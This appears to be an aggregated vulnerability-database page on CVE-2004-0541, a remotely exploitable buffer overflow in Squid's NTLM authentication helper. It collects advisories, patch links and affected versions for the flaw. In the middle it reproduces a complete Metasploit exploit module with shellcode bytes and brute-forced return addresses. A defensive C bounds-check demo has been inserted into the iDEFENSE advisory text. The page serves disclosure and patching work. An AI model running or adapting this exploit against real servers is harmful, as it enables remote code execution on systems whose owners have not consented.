CVE-2004-0541
CVSS 10.0
Published: 2004-08-06 00:00:00
Revised: 2010-08-21 00:20:43

[Original] Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handlers enabled, allows remote attackers to execute arbitrary code via a long password ("pass" variable).


[CNNVD] Squid Proxy NTLM Authentication Buffer Overflow Vulnerability (CNNVD-200408-098)

        
Squid is an efficient Web cache and proxy program. It was originally developed for the Unix platform and has since been ported to Linux and most Unix-like systems; recent Squid releases also run on Windows.
The Squid Web proxy lacks sufficient bounds checking when processing NTLM authentication. A remote attacker can exploit this vulnerability to carry out a buffer overflow attack and may execute arbitrary instructions on the system with the privileges of the Squid process.
Squid Web Proxy Cache supports Basic, Digest and NTLM authentication. The vulnerability lies in the NTLM authentication helper, in the ntlm_check_auth() function of helpers/ntlm_auth/SMB/libntlmssp.c:

char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length)
{
    int rv;
    char pass[25] /*, encrypted_pass[40] */;
    char *domain = credentials;
    ...
    memcpy(pass, tmp.str, tmp.l);
    ...

Because the function performs no bounds check on the value copied into the 'pass' variable, an overly long password field can overflow the buffer and lead to execution of arbitrary instructions. The 'tmp.str' and 'tmp.l' variables passed to memcpy() both contain user-supplied data.
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (Affected Platforms and Products)

cpe:/a:national_science_foundation:squid_web_proxy_cache:2.5_stable
cpe:/a:national_science_foundation:squid_web_proxy_cache:3_pre

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:980  NTLM Authentication BO in Squid Web Proxy Cache
oval:org.mitre.oval:def:10722  Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handl...
*OVAL describes in detail how to detect this vulnerability; further technical detail on detection can be found in the related OVAL definitions.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0541
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0541
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-098
(official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/16360
(VENDOR_ADVISORY)  XF  squid-ntlm-bo(16360)
http://www.redhat.com/support/errata/RHSA-2004-242.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:242
http://www.idefense.com/application/poi/display?id=107&type=vulnerabilities
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/application/poi/display?id=107&type=vulnerabilities
http://www.gentoo.org/security/en/glsa/glsa-200406-13.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200406-13
http://www.trustix.net/errata/2004/0033/
(VENDOR_ADVISORY)  TRUSTIX  2004-0033
ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
(UNKNOWN)  SGI  20040604-01-U
http://www.securityfocus.com/bid/10500
(UNKNOWN)  BID  10500
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152809

- Vulnerability Information

Squid Proxy NTLM Authentication Buffer Overflow Vulnerability
Critical  Boundary Condition Error
2004-08-06 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and Patches

        Vendor patches:
        MandrakeSoft
        ------------
        MandrakeSoft has released a security advisory (MDKSA-2004:059) and corresponding patches for this issue:
        MDKSA-2004:059:Updated squid packages fix remotely exploitable vulnerability
        Link:
        http://www.linux-mandrake.com/en/security/2004/2004-059.php

        Patch download:
        Updated Packages:
        Mandrakelinux 10.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/squid-2.5.STABLE4-1.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/SRPMS/squid-2.5.STABLE4-1.2.100mdk.src.rpm
        Mandrakelinux 10.0/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/squid-2.5.STABLE4-1.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/SRPMS/squid-2.5.STABLE4-1.2.100mdk.src.rpm
        Mandrakelinux 9.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/RPMS/squid-2.5.STABLE1-7.2.91mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/SRPMS/squid-2.5.STABLE1-7.2.91mdk.src.rpm
        Mandrakelinux 9.1/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/RPMS/squid-2.5.STABLE1-7.2.91mdk.ppc.rpm
        The updated packages above can also be downloaded from any of the mirror FTP servers listed at:
        
        http://www.mandrakesecure.net/en/ftp.php

        S.u.S.E.
        --------
        S.u.S.E. has released a security advisory (SuSE-SA:2004:016) and corresponding patches for this issue:
        SuSE-SA:2004:016:squid
        Link:
        Patch download:
        SuSE Patch squid-2.4.STABLE6-9.i386.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/squid-2.4.STABLE6-9.i386.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE5-42.9.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/squid-2.5.STABLE5-42.9.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE5-42.9.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/squid-2.5.STABLE5-42.9.i586.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE5-42.9.x86_64.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/squid-2.5.STABLE5-42.9.x86_64.rpm
        Opteron x86_64 Platform
        SuSE Patch squid-2.5.STABLE5-42.9.x86_64.patch.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/squid-2.5.STABLE5-42.9.x86_64.patch.rpm
        Opteron x86_64 Platform
        SuSE Upgrade squid-2.5.STABLE3-110.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/squid-2.5.STABLE3-110.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE3-110.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/squid-2.5.STABLE3-110.i586.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE3-110.x86_64.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/squid-2.5.STABLE3-110.x86_64.rpm
        Opteron x86_64 Platform
        SuSE Patch squid-2.5.STABLE3-110.x86_64.patch.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/squid-2.5.STABLE3-110.x86_64.patch.rpm
        Opteron x86_64 Platform
        Squid Web Proxy Cache 2.5 STABLE1:
        Squid Patch libntlmssp.c.patch
        
        http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

        SuSE Upgrade squid-2.5.STABLE1-98.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/squid-2.5.STABLE1-98.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE1-98.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/squid-2.5.STABLE1-98.i586.patch.rpm
        Intel i386 Platform
        Squid
        -----
        The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage:
        Squid Patch libntlmssp.c.patch
        
        http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

- Vulnerability Information (16847)

Squid NTLM Authenticate Overflow (EDBID:16847)
linux remote
2010-04-30 Verified
0 metasploit
N/A [Download]
##
# $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Squid NTLM Authenticate Overflow',
			'Description'    => %q{
					This is an exploit for Squid's NTLM authenticate overflow
				(libntlmssp.c). Due to improper bounds checking in
				ntlm_check_auth, it is possible to overflow the 'pass'
				variable on the stack with user controlled data of a user
				defined length.  Props to iDEFENSE for the advisory.
			},
			'Author'         => 'skape',
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2004-0541'],
					[ 'OSVDB', '6791'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
					[ 'BID', '10500'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 256,
					'MinNops'  => 16,
					'Prepend'  => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
					'PrependEncoder' => "\x83\xec\x7f",

				},
			'Targets'        =>
				[
					[ 'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
									'Stop'  => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
									'Step'  => 0
								}
						},
					],
				],
			'DisclosureDate' => 'Jun 8 2004',
			'DefaultTarget'  => 0))

		register_advanced_options(
			[
				# We must wait 15 seconds between each attempt so as to prevent
				# squid from exiting completely after 5 crashes.
				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
			], self.class)
	end

	def brute_exploit(addresses)
		site = "http://" + rand_text_alpha(rand(128)) + ".com"

		print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
		connect

		trasnmit_negotiate(site)
		transmit_authenticate(site, addresses)

		handler
		disconnect
	end

	def trasnmit_negotiate(site)
		negotiate  =
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x01\x00\x00\x00"   + # NTLMSSP_NEGOTIATE
			"\x07\x00\xb2\x07"   + # flags
			"\x01\x00\x09\x00"   + # workgroup len/max       (1)
			"\x01\x00\x00\x00"   + # workgroup offset        (1)
			"\x01\x00\x03\x00"   + # workstation len/max     (1)
			"\x01\x00\x00\x00"     # workstation offset      (1)

		print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
			"\r\n"
		sock.put(req)

	end

	def transmit_authenticate(site, addresses)
		overflow     =
			rand_text_alphanumeric(0x20) +
			[addresses['Ret']].pack('V') +
			[addresses['Valid']].pack('V') +
			"\xff\x00\x00\x00"
		shellcode    = payload.encoded
		pass_len     = [overflow.length + shellcode.length].pack('v')
		authenticate =
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x03\x00\x00\x00"   + # NTLMSSP_AUTHENTICATE
			pass_len + pass_len  + # lanman response len/max
			"\x38\x00\x00\x00"   + # lanman response offset  (56)
			"\x01\x00\x01\x00"   + # nt response len/max     (1)
			"\x01\x00\x00\x00"   + # nt response offset      (1)
			"\x01\x00\x01\x00"   + # domain name len/max     (1)
			"\x01\x00\x00\x00"   + # domain name offset      (1)
			"\x01\x00\x01\x00"   + # user name               (1)
			"\x01\x00\x00\x00"   + # user name offset        (1)
			"\x00\x00\x00\x00"   + # session key
			"\x8b\x00\x00\x00"   + # session key
			"\x06\x82\x00\x02"   + # flags
			overflow + shellcode

		print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
			"\r\n"
		sock.put(req)
	end

end
		

- Vulnerability Information (F82249)

Squid NTLM Authenticate Overflow (PacketStormID:F82249)
2009-10-27 00:00:00
skape  
exploit,overflow
CVE-2004-0541
[Download]

This is an exploit for Squid's NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length.


- Vulnerability Information (F33527)

iDEFENSE Security Advisory 2004-06-08.t (PacketStormID:F33527)
2004-06-10 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2004-0541
[Download]

iDEFENSE Security Advisory 06.08.04: A remote attacker can compromise a target system if Squid Proxy is configured to use the NTLM authentication helper. The attacker can send an overly long password to overflow the buffer and execute arbitrary code.

Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability

iDEFENSE Security Advisory 06.08.04:

*I. BACKGROUND*

Squid is a fully-featured Web Proxy Cache designed to run on Unix
systems and supports proxying and caching of HTTP, FTP, and other URLs,
as well as SSL support, cache hierarchies, transparent caching, access
control lists and many other features. More information is available at
http://www.squid-cache.org.

*II. DESCRIPTION*

Remote exploitation of a buffer overflow vulnerability in Squid Web
Proxy Cache could allow a remote attacker to execute arbitrary code.
Squid Web Proxy Cache supports Basic, Digest and NTLM authentication.
The vulnerability specifically exists within the NTLM authentication
helper routine, ntlm_check_auth(), located in
helpers/ntlm_auth/SMB/libntlmssp.c:

char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length)
{
    int rv;
    char pass[25] /*, encrypted_pass[40] */;
    char *domain = credentials;
    ...
    memcpy(pass, tmp.str, tmp.l);
    ...

The function contains a buffer overflow vulnerability due to a lack of
bounds checking on the values copied to the 'pass' variable. Both the
'tmp.str' and 'tmp.l' variables used in the memcpy() call contain
user-supplied data.
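The advisory snippet shows the defect, not the fix. As an added illustration (not Squid's code and not the official libntlmssp.c.patch), the following C program models the same copy with the two checks a hardened helper needs: the LanMan-response security buffer (16-bit length, 16-bit max length, 32-bit offset, as in NTLMSSP AUTHENTICATE messages) must lie inside the bytes actually received, and its length must fit the 25-byte 'pass' buffer before memcpy() runs. The function names, the enum, and the three AUTHENTICATE messages are hypothetical and constructed here for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PASS_BUF_SIZE 25   /* same size as 'char pass[25]' in the advisory snippet */

/* Outcome of extracting the LanMan response field (hypothetical names). */
enum lm_result { LM_OK = 0, LM_TRUNCATED = 1, LM_FIELD_OUT_OF_BOUNDS = 2, LM_TOO_LONG = 3 };

/* NTLMSSP integers are little-endian on the wire. */
static uint16_t le16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Hypothetical hardened counterpart of the copy in ntlm_check_auth().
 * Layout assumed: "NTLMSSP\0" (8) + message type (4) + LanMan-response
 * security buffer: len (2), maxlen (2), offset (4).  The unpatched code
 * does memcpy(pass, tmp.str, tmp.l) with both values taken from the message;
 * here every message-derived value is validated before the copy.
 */
static enum lm_result extract_lm_response(const unsigned char *msg, size_t msg_len,
                                          unsigned char pass[PASS_BUF_SIZE], size_t *out_len)
{
    if (msg_len < 20)                         return LM_TRUNCATED;   /* header incomplete */
    if (memcmp(msg, "NTLMSSP\0", 8) != 0)     return LM_TRUNCATED;   /* not an NTLMSSP message */
    if (le32(msg + 8) != 3)                   return LM_TRUNCATED;   /* not NTLMSSP_AUTHENTICATE */

    uint16_t len = le16(msg + 12);
    uint32_t off = le32(msg + 16);

    /* 1. The field must lie inside the bytes received; written so off + len cannot overflow. */
    if (off > msg_len || len > msg_len - off)  return LM_FIELD_OUT_OF_BOUNDS;
    /* 2. The field must fit the destination; this is the check the vulnerable code lacks. */
    if (len > PASS_BUF_SIZE)                   return LM_TOO_LONG;

    memcpy(pass, msg + off, len);
    *out_len = len;
    return LM_OK;
}

/* Build a constructed AUTHENTICATE message with the given LanMan-response
   length/offset fields and body_len filler bytes after the 20-byte header. */
static size_t build_authenticate(unsigned char *out, size_t out_cap,
                                 uint16_t lm_len, uint32_t lm_off, size_t body_len)
{
    if (out_cap < 20 + body_len) return 0;
    memset(out, 0, out_cap);
    memcpy(out, "NTLMSSP\0", 8);
    out[8]  = 3;                                   /* NTLMSSP_AUTHENTICATE, little-endian */
    out[12] = (unsigned char)(lm_len & 0xff);  out[13] = (unsigned char)(lm_len >> 8);
    out[14] = out[12];                          out[15] = out[13];   /* maxlen = len */
    out[16] = (unsigned char)(lm_off & 0xff);         out[17] = (unsigned char)((lm_off >> 8) & 0xff);
    out[18] = (unsigned char)((lm_off >> 16) & 0xff); out[19] = (unsigned char)((lm_off >> 24) & 0xff);
    memset(out + 20, 'A', body_len);
    return 20 + body_len;
}

/* Construct one message and return how the hardened extractor classifies it. */
int classify_case(uint16_t lm_len, uint32_t lm_off, size_t body_len)
{
    unsigned char msg[256], pass[PASS_BUF_SIZE];
    size_t got = 0;
    size_t n = build_authenticate(msg, sizeof msg, lm_len, lm_off, body_len);
    return (int)extract_lm_response(msg, n, pass, &got);
}

/* Three constructed cases: a 24-byte response is accepted, a 64-byte one is
   rejected as too long, and an offset past the end is rejected as out of bounds. */
int run_cases(void)
{
    return classify_case(24, 20, 24) == LM_OK
        && classify_case(64, 20, 64) == LM_TOO_LONG
        && classify_case(8, 200, 8)  == LM_FIELD_OUT_OF_BOUNDS;
}

int main(void)
{
    int ok = run_cases();
    printf("%s\n", ok ? "all bounds checks behaved as expected" : "FAIL");
    return ok ? 0 : 1;
}
```

Both checks are needed: the destination-size check alone still lets a crafted offset read past the end of the received message, and the in-message check alone still lets a 64-byte field land in a 25-byte buffer.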

*III. ANALYSIS*

A remote attacker can compromise a target system if Squid Proxy is
configured to use the NTLM authentication helper. The attacker can send
an overly long password to overflow the buffer and execute arbitrary
code.

*IV. DETECTION*

iDEFENSE has confirmed the existence of this vulnerability in
Squid-Proxy 2.5.*-STABLE and 3.*-PRE when Squid-Proxy is compiled with
the NTLM helper enabled.

*V. WORKAROUNDS*

Recompile Squid-Proxy with NTLM handlers disabled.

*VI. VENDOR RESPONSE*

A patch for this issue is available at:

http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

*VII. CVE INFORMATION*

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0541 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

*VIII. DISCLOSURE TIMELINE*

04/27/04  Exploit acquired by iDEFENSE
05/19/04  iDEFENSE Clients notified
05/20/04  Initial vendor notification
05/20/04  Initial vendor response
06/07/04  Public Disclosure

*IX. CREDIT*

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

*X. LEGAL NOTICES*

Copyright     

- Vulnerability Information

6791
Squid ntlm_check_auth Function NTLM Authentication Helper Password Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified

- Vulnerability Description

A remote overflow exists in the Squid Internet Object Cache server. Squid fails to correctly test the length of the user-supplied LanMan Hash value in the ntlm_check_auth() function resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code on the system with the privileges the Squid process is running under. This flaw can only be exploited if Squid was compiled with the NTLM authentication helper enabled.

- Timeline

2004-06-08 2004-06-09
2004-06-09 Unknown

- Solution

A patch has been released for this vulnerability available from the Squid website. Additionally, Squid can be recompiled to disable NTLM authentication.

- References

- Vulnerability Author

- Vulnerability Information

Squid Proxy NTLM Authentication Buffer Overflow Vulnerability
Boundary Condition Error 10500
Yes No
2004-06-09 12:00:00 2007-11-15 12:40:00
The discoverer of this issue wishes to remain anonymous.

- Affected Program Versions

Squid Web Proxy Cache 2.5 .STABLE5
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Squid Web Proxy Cache 2.5 .STABLE4
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
+ OpenPKG OpenPKG Current
Squid Web Proxy Cache 2.5 .STABLE3
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG 1.3
+ Red Hat Enterprise Linux AS 3
+ Red Hat Fedora Core1
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
Squid Web Proxy Cache 2.5 .STABLE1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ S.u.S.E. Linux Personal 8.2
Squid Web Proxy Cache 2.4 .STABLE7
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
Squid Web Proxy Cache 2.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Squid Web Proxy Cache 2.3 .STABLE5
Squid Web Proxy Cache 2.1 PATCH2
Squid Web Proxy Cache 2.0 PATCH2
SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Linux 8.0 i686
RedHat Linux 8.0 i386
RedHat Linux 8.0
RedHat Linux 7.3 i386
Red Hat Fedora Core2
Red Hat Fedora Core1
Mandriva Linux Mandrake 7.2
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- Vulnerability Discussion

Squid Web Proxy Cache is reportedly affected by a buffer-overflow vulnerability when processing NTLM authentication credentials. The application fails to properly validate buffer boundaries when copying user-supplied input.

This would allow an attacker to modify stack-based process memory to cause a denial-of-service condition and execute arbitrary code in the context of the vulnerable web proxy. This will most likely facilitate unauthorized access to the affected computer.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit is available for the Metasploit Framework:

- Solution

Please see the referenced advisories for more information and fixes.


Squid Web Proxy Cache 2.4

Squid Web Proxy Cache 2.5 .STABLE4

Squid Web Proxy Cache 2.5 .STABLE1

Squid Web Proxy Cache 2.5 .STABLE3

Squid Web Proxy Cache 2.5 .STABLE5

SGI ProPack 3.0

- References

 

 
